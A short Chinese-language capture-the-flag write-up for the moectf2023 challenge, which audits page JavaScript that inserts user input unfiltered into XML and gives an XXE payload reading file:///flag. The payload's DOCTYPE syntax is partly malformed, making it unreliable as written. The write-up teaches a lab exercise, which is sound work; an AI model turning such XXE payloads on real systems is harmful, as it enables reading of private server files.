moectf2023-了解你的座驾-胎教版wp

  • 1.进入题目环境后,点击左侧即可选择展示的内容
  • 2.点击最后一个标签显示:
  • 3.看到提示flag在根目录下,先做源码审计
js 复制代码
function submitForm(name) {
			var form = document.createElement("form");
			form.method = "post";
			form.action = "index.php";

			var input = document.createElement("input");
			input.type = "hidden";
			input.name = "xml_content";
			input.value = "<xml><name>" + name + "</name></xml>";

			form.appendChild(input);
			document.body.appendChild(form);
			form.submit();
		}
  • 发现源码中的js部分处理时存在XXE漏洞:
js 复制代码
			var input = document.createElement("input");
			input.type = "hidden";
			input.name = "xml_content";
			input.value = "<xml><name>" + name + "</name></xml>";
  • 所谓XXE即xml外部实体注入,通过自定义外部实体并使用来读取文件或进行SSRF攻击。在这里参数name被直接插入到xml结构当中,没有做任何过滤,因此可以进行XXE攻击,payload如下:
    <?xml version="1.0" encoding="utf-8"?><!DOCTYPE xxe [!ELEMENT name ANY]<!ENTITY xxe SYSTEM "file:///flag" >]><xml><name>&xxe;</name></xml>
相关推荐
程序员 沐阳3 分钟前
从内容管控到硬件隔离:Chrome 安全防护体系深度拆解
前端·chrome·安全
小陈工8 分钟前
2026年4月5日技术资讯洞察:AI商业模式变革、知识管理革命与开源生态反击
开发语言·人工智能·python·安全·oracle·开源
Xudde.13 分钟前
班级作业笔记报告0x09
笔记·学习·安全·web安全·php
hzxpaipai24 分钟前
外贸网站制作:为何派迪科技做的网站性能与打开速度如此不错?
开发语言·前端·网络·科技·安全
正在努力的网络架构师27 分钟前
安全服务:WAF/HSS
安全·云网络
CHICX122929 分钟前
3.SQL 注入之高权限注入(上):从权限原理到跨库攻击,吃透 root 权限注入的危害与防御
web安全·网络安全
m0_7381207230 分钟前
渗透基础知识ctfshow——Web应用安全与防护(第二章)
服务器·前端·安全·web安全·php
无忧智库37 分钟前
医疗保障信息平台安全体系:从“合规堆砌”到“内生安全”的实战化重构(PPT)
安全·重构
鹅天帝1 小时前
20260407网安学习日志——序列化漏洞
前端·学习·web安全·网络安全·xss
爱思考的发菜_汽车网络信息安全1 小时前
汽车网络安全:ECC算法详细解析
安全·web安全·汽车